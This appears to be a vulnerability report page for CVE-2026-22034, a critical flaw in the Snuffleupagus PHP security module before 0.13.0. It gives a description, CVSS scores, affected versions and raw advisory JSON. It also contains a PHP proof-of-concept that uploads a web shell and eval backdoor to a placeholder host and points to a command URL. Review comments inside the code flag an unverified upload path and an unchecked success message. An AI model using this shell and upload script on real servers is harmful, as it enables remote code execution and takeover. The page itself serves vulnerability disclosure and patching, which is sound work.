Security Vulnerability Report
CVE-2026-22034 CVSS 9.8 CRITICAL

CVE-2026-22034

Published: 2026-01-08 15:15:45
Last Modified: 2026-03-09 14:04:29

Description

Snuffleupagus is a module that raises the cost of attacks against websites by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jvoisin:snuffleupagus:*:*:*:*:*:*:*:* - VULNERABLE
Snuffleupagus < 0.13.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<?php
// CVE-2026-22034 PoC - Snuffleupagus Upload Validation RCE
// This PoC demonstrates how a malicious PHP file can be executed
// when Snuffleupagus upload validation is enabled without VLD extension
//
// NOTE(review): the page labels this listing "python"; it is PHP and was
// collapsed onto a single line in the page, which turned everything after
// `<?php` into one `//` comment. Line breaks are restored here; tokens are
// unchanged.
//
// Preconditions, as stated in the advisory text on this page: Snuffleupagus
// < 0.13.0, the non-default upload validation feature enabled with one of the
// upstream VLD-based validation scripts, and the VLD extension not available
// to the CLI SAPI. Under those conditions uploaded multipart files are
// evaluated as PHP. Mitigation per the same text: upgrade to 0.13.0.
//
// Malicious file content to be uploaded
// Payload string kept byte-for-byte as it appears on the page (one line).
$malicious_payload = '<?php // Attempt to execute system commands if(isset($_GET["cmd"])) { echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } // Or backdoor connection @eval($_POST["backdoor"]); ?>';
// Simulate multipart POST upload request
// Hand-built multipart body: the boundary is random per run so it cannot
// collide with payload content.
$boundary = "----WebKitFormBoundary" . bin2hex(random_bytes(16));
$post_data = "--$boundary\r\n";
$post_data .= "Content-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n";
$post_data .= "Content-Type: application/x-php\r\n\r\n";
$post_data .= $malicious_payload . "\r\n";
$post_data .= "--$boundary--\r\n";
// Send the malicious upload request
// "target-server.com" is a placeholder host; this is a real outbound request.
$ch = curl_init("http://target-server.com/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// CURLOPT_POSTFIELDS is given the raw string, so the Content-Type header
// with the matching boundary must be set explicitly below.
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    "Content-Type: multipart/form-data; boundary=$boundary"
]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// $response is never inspected; curl_exec() returns false on transport
// failure, so "Upload completed" is printed even when nothing was sent.
$response = curl_exec($ch);
curl_close($ch);
// NOTE(review): nothing in this script or in the advisory text shows the
// target storing the upload under /uploads/; the URL below is an unverified
// assumption about the target. The advisory describes evaluation at upload
// validation time, not a persisted file.
echo "Upload completed. Access shell at: http://target-server.com/uploads/shell.php?cmd=id\n";
?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22034", "sourceIdentifier": "[email protected]", "published": "2026-01-08T15:15:45.150", "lastModified": "2026-03-09T14:04:29.357", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Snuffleupagus is a module that raises the cost of attacks against website by killing bug classes and providing a virtual patching system. On deployments of Snuffleupagus prior to version 0.13.0 with the non-default upload validation feature enabled and configured to use one of the upstream validation scripts based on Vulcan Logic Disassembler (VLD) while the VLD extension is not available to the CLI SAPI, all files from multipart POST requests are evaluated as PHP code. The issue was fixed in version 0.13.0."}, {"lang": "es", "value": "Snuffleupagus es un módulo que eleva el coste de los ataques contra sitios web eliminando clases de errores y proporcionando un sistema de parcheo virtual. En despliegues de Snuffleupagus anteriores a la versión 0.13.0 con la característica de validación de subida no predeterminada habilitada y configurada para usar uno de los scripts de validación ascendentes basados en Vulcan Logic Disassembler (VLD) mientras la extensión VLD no está disponible para la SAPI CLI, todos los archivos de las solicitudes POST multipart se evalúan como código PHP. 
El problema se solucionó en la versión 0.13.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-636"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jvoisin:snuffleupagus:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.13.0", "matchCriteriaId": "27E48E9D-66B6-409E-8510-A8770570D1A4"}]}]}], "references": [{"url": "https://github.com/jvoisin/snuffleupagus/blob/9278dc77bab2a219e770a1b31dd6797bc9070e37/src/sp_upload_validation.c#L92-L100", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.php", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/blob/v0.12.0/scripts/upload_validation.py", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/jvoisin/snuffleupagus/commit/9278dc77bab2a219e770a1b31dd6797bc9070e37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/jvoisin/snuffleupagus/security/advisories/GHSA-c4ch-xw5p-2mvc", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory", "Exploit"]}, {"url": "https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ext/standard/dl.c#L165-L166", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/php/php-src/blob/e4098da58a9eaee759d728d98a27d809cde37671/ma ... (truncated)